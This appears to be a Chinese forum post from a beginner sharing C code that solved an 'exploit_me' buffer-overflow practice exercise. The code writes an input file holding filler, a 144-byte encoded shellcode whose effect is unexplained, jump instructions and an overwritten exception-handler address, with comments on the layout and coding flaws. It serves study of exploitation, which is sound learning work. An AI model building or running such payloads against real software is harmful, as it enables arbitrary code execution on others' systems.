刚学了几天溢出，看到这个练习便想拿来练练手，竟然做出来了，倍感有动力。
代码:
#include <stdio.h>
#include <windows.h>

/*
 * Generates the 224-byte input file used for the "exploit_me" overflow
 * exercise described in the post.  The code is kept byte-identical here;
 * the payload's correctness depends entirely on the exact offsets below, so
 * only comments are added.
 *
 * Buffer layout as written (all offsets are fixed in the code, not computed):
 *   [0,67)    0x41 filler
 *   [67,211)  the 144 shellcode bytes
 *   [211,216) longjmp: 5-byte near jmp, E9 rel32 with rel32 = -149; from the
 *             end of that instruction (offset 216) it lands at offset 67,
 *             i.e. the start of the shellcode
 *   [216,220) shortjmp = 0x9090f9eb stored little-endian as EB F9 90 90
 *             (a 2-byte short jmp backwards followed by two NOPs)
 *   [220,224) handler = 0x00280b0b, an absolute address written as 4 bytes
 * The names shortjmp/handler suggest the last two fields overwrite an
 * exception-handler record in the target program; that is inferred from the
 * naming and the exercise, nothing on this page shows the target itself.
 *
 * Review notes (defensive):
 *   - malloc() is called without an explicit <stdlib.h> include; its result
 *     is never checked and the buffer is never freed.
 *   - CreateFile() may return INVALID_HANDLE_VALUE (e.g. the hard-coded
 *     F:\desktop\... path does not exist); the handle is passed to WriteFile
 *     without a check, and WriteFile's return value / BytesWritten are ignored.
 *   - The sizes 67, 144, 5, 4, 4 add up to exactly 224, so the writes stay
 *     inside the allocation as long as the literals are not edited
 *     independently of each other.
 */
int main()
{
    HANDLE hFile;
    PVOID buffer;
    DWORD BytesWritten;
    DWORD shortjmp = 0x9090f9eb;   /* EB F9 90 90 once stored in memory */
    DWORD handler = 0x00280b0b;    /* absolute address expected by the exercise */
    char shellcode[] =
        "\xd9\xcb\x31\xc9\xbf\x46\xb7\x8b\x7c\xd9\x74\x24\xf4\xb1"
        "\x1e\x5b\x31\x7b\x18\x03\x7b\x18\x83\xc3\x42\x55\x7e\x80"
        "\xa2\xdd\x81\x79\x32\x55\xc4\x45\xb9\x15\xc2\xcd\xbc\x0a"
        "\x47\x62\xa6\x5f\x07\x5d\xd7\xb4\xf1\x16\xe3\xc1\x03\xc7"
        "\x3a\x16\x9a\xbb\xb8\x56\xe9\xc4\x01\x9c\x1f\xca\x43\xca"
        "\xd4\xf7\x17\x29\x11\x7d\x72\xba\x46\x59\x7d\x56\x1e\x2a"
        "\x71\xe3\x54\x73\x95\xf2\x81\x07\xb9\x7f\x54\xf3\x48\x23"
        "\x73\x07\x89\x83\x4a\xf1\x6d\x6a\xc9\x76\x2b\xa2\x9a\xc9"
        "\xbf\x49\xec\xd5\x12\xc6\x65\xee\xe5\x21\xf6\x2e\x9f\x81"
        "\x91\x5e\xd5\x26\x3d\xf7\x71\xd8\x4b\x09\xd6\xda\xab\x75"
        "\xb9\x48\x57\x7a";
    /* E9 6B FF FF FF: near jmp, rel32 = -149 -> back to offset 67 */
    char longjmp[] = "\xe9\x6b\xff\xff\xff";

    buffer = malloc(224);                       /* unchecked: NULL on failure */
    hFile = CreateFile("F:\\desktop\\exploit_me\\exploit_me\\4\\1.txt",
                       GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS,
                       FILE_ATTRIBUTE_NORMAL, 0);   /* unchecked handle */

    memset(buffer, 0x41, 67);                             /* [0,67)   filler    */
    memcpy((char *)buffer + 67, shellcode, 144);          /* [67,211) shellcode */
    memcpy((char *)buffer + 211, longjmp, 5);             /* [211,216) near jmp */
    memcpy((char *)buffer + 216, &shortjmp, 4);           /* [216,220) EB F9 90 90 */
    memcpy((char *)buffer + 220, &handler, 4);            /* [220,224) address  */

    /* Return value and BytesWritten are not inspected; a short write or a
       failed CreateFile above goes unnoticed. */
    WriteFile(hFile, buffer, 224, &BytesWritten, NULL);
    CloseHandle(hFile);
    return 0;                                   /* buffer is never freed */
}